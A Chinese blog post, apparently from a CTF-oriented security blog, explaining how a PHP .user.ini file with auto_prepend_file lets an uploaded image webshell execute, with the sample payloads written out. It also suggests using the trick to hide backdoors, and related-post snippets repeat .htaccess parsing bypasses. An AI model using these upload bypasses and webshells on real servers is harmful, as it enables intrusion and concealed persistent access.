.user.ini在文件上传中的应用

最新推荐文章于 2024-04-18 22:13:08 发布
最新推荐文章于 2024-04-18 22:13:08 发布
阅读量437 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37387187/article/details/117519941
版权

.user.ini

我们先在php手册上看一下对.user.ini的介绍:

在这里插入图片描述
也就是说我们可以在.user.ini中设置php.ini中PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置,而且只要是在使用 CGI/FastCGI 模式的服务器上都可以使用.user.ini

在p牛的文章中提到了两个有趣的设置:auto_prepend_file和auto_append_file

我们再到手册中看了下这两个设置的定义:

在这里插入图片描述
大致意思就是:我们指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),类似于在index.php中插入一句:require(./a.jpg);

这两个设置的区别只是在于auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)
.user.ini实战利用的可能性

综上所述.user.ini的利用条件如下:

服务器脚本语言为PHP
服务器使用CGI/FastCGI模式
上传目录下要有可执行的php文件

看过.user.ini的分析后我们的思路应该比较清晰了,我们可以上传一个这样的.user.ini:

GIF89a
auto_prepend_file=a.jpg

然后再上传一个这样的图片马a.jpg:

GIF89a
<script language='php'>system('cat /flag');</script>

接着URL访问上传目录中的可执行文件即可使用菜刀进行连接。

但仔细推敲我们就会感到“上传目录下要有可执行的php文件”这个要求在文件上传中也比较苛刻,应该没有天才开发者会把上传文件放在主目录或者把php文件放在上传文件夹。

但也不是全无办法,如果我们根据实际情况配合其他漏洞使用可能会有奇效,前段时间我遇到一个CMS对上传时的路径没有检测…/,因此导致文件可被上传至任意目录,这种情况下我们就很有可能可以利用.user.ini

除此之外,把.user.ini利用在隐藏后门上应该是个很好的利用方法,我们在存在php文件的目录下留下.user.ini和我们的图片马,这样就达到了隐藏后门的目的。

哈哈哈神经病啊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
建站过程php.ini及config.inc.php
05-16
3. 定期检查`php.ini`安全设置,如文件上传限制,防止恶意文件上传。 4. 对于`config.inc.php`,应定期更新数据库密码,并且不要在版本控制系统明文存储敏感信息,可以使用环境变量或者密钥管理服务。 总的来...
4.0-1.zip
最新发布
05-29
2. `.user.ini`:在PHP环境,此文件用于设置目录级别的PHP配置,可以覆盖全局的php.ini设置,比如限制文件上传大小或设置脚本执行时间。 3. `index.php`:通常是网站的入口文件,负责处理请求并加载相应的PHP代码...
.user.ini上传详解附CTF例题
hxhxhxhxx的博客
07-06 2557
.user.ini上传详解附CTF例题题目解法 https://buuoj.cn/challenges#[SUCTF%202019]CheckIn [SUCTF 2019]CheckIn 题目 解法 GIF89a //绕过exif_imagetype() auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。它包含在所有php文件前先执行 auto_append_file=a.j
文件上传 .htaccess 与.user.ini
devil8123665的博客
03-13 2388
htaccess uesr.ini
文件上传-.user.ini的妙用
A_991128a的博客
04-14 724
小伙伴们大家好!本期为大家带来的是在文件上传漏洞的妙用。.user.ini.user.ini的妙用原理利用.user.ini的环境实战演示​1、先尝试直接上传webshell2、看是否能够上传除php和png外的文件3、上传.user.ini文件4、再次尝试上传webshell5、测试上传的.user.ini与webshell是否能够正常生效6、使用连接工具连接webshell。
文件上传之利用user.ini实现任意文件上传
wcwdnmdnmd的博客
02-02 576
攻防世界的easyupload,利用user.ini实现文件上传
基于PHP的FPS88php文件上传管理系统源码.zip
08-26
在FPS88php文件上传管理系统,核心功能可能包括以下几点: 1. **文件上传**:用户可以通过前端界面选择本地文件进行上传。PHP通过`$_FILES`全局变量接收上传的文件信息,并使用`move_uploaded_file()`函数将文件...
Chevereto图片上传程序 v2.5.2.zip
07-08
mixed:在原名添加随机字符 folder_images:图片储存目录 folder_thumbs:缩略图储存目录 virtual_folder_image:虚拟图片目录,即展示图片页的虚拟路径 virtual_folder_uploaded:多图片上传时显示上传进程的...
PHP图在线加水印源码.rar
02-18
6. .user.ini:可能是一个PHP配置文件,用于设置特定目录的PHP运行时配置。 7. README.md:这是一个markdown格式的文件,通常包含项目简介、安装指南、使用示例以及开发者信息。 综合以上分析,这个压缩包提供了...
文件上传漏洞的.user.ini文件
weixin_65279640的博客
04-18 908
因此,正确配置 PHP 和服务器权限,以及限制对上传目录的访问,是非常重要的。文件允许用户为特定目录定义 PHP 配置指令,这些配置指令将在该目录及其所有子目录的 PHP 脚本执行时生效。这样,不同的应用程序或用户可以在自己的目录设置特定的 PHP 配置,而不影响整个服务器的配置。文件是 PHP 用于配置特定目录的设置的特殊文件。如果服务器上的 PHP 没有正确配置,那么每当有 PHP 文件在这个目录下被访问时,文件到 PHP 服务器上,他们可能会利用这个文件来改变服务器的配置,例如修改。
利用.user.ini构建php后门
good good study
01-27 4772
服务器以fastcgi启动运行的时候,.user.ini也是php的一种配置文件,众所周知php.ini是php的配置文件,它可以做到显示报错,导入扩展,文件解析,web站点路径等等设置。但是如果想要把某个文件里面的配置与全局的php.ini不同,则可以在php文件加上ini_set()来配置特定的配置变量。
PHP代码审计:文件上传(.user.ini)绕过
qq_22132931的博客
10-24 1094
php代码审计
[文件上传]浅析.user.ini的利用
cosmoslin的博客
10-16 6810
.user.ini php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,我们可以利用这个文件来构造后门和隐藏后门。 实例 php 配置项有两个配置可以起到一些作用 auto_prepend_file = <filename> //包含在文件头 auto_append_file = <filename> //包含在文件尾
.user.ini上传绕过
ChenZIDu的博客
09-22 2704
题目是2019SUCTF的Checkln 先进入题目看到的是: 文件上传,经过多方尝试之后发现只能上传图片格式的,看了题解之后发现他是 getimagesize可以用普通文件,通过设置height以及width来绕过。 这题要求我们使用.user.ini 所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常...
文件上传-.user.ini文件
Jim2g
07-29 955
.user.ini 的详细配置介绍链接: https://www.php.net/manual/zh/ini.list.php 使用条件: (1)服务器脚本语言为PHP (2)对应目录下面有可执行的php文件 (3)服务器使用CGI/FastCGI模式 .user.ini.它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。 实例:上传.user.ini绕过黑名单检验 GIF89a //绕过exif_i
文件上传--.hatccess--.user.ini
qq_43613772的博客
07-24 1806
1、.htaccess文件 文件上传: 一般.htaccess可以用来留后门和针对黑名单绕过 文件另存为.htaccess写入: AddType application/x-httpd-php .png //png文件解析为php文件 上传.htaccess 必须是网站根路径 留后门: 可以在.htaccess 加入php解析规则 类似于把文件名包含1的解析成php <FilesMatch "1"> SetHandler application/x-httpd-php </Fi
.user.ini 作用和配置
热门推荐
冰恋云的专栏
04-08 1万+
.htaccess是伪静态环境配置文件,用于lamp。 .user.ini是lnmp文件,里面放的是你网站的文件夹路径地址。目的是防止跨目录访问和文件跨目录读取. 配置 放在根目录 .user.ini open_basedir=/项目路径/:/tmp/:/proc/ 例:open_basedir=/www/aaa/:/tmp/:/proc/ 测试: 没...
文件上传.user.ini使用
09-10
2. 设置文件上传的配置:在文件上传.user.ini ,你可以设置一些上传文件的相关参数。例如,你可以设置最大允许上传的文件大小、允许上传的文件类型等。这些配置将会影响到你的 PHP 程序在上传文件时的行为。 3. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值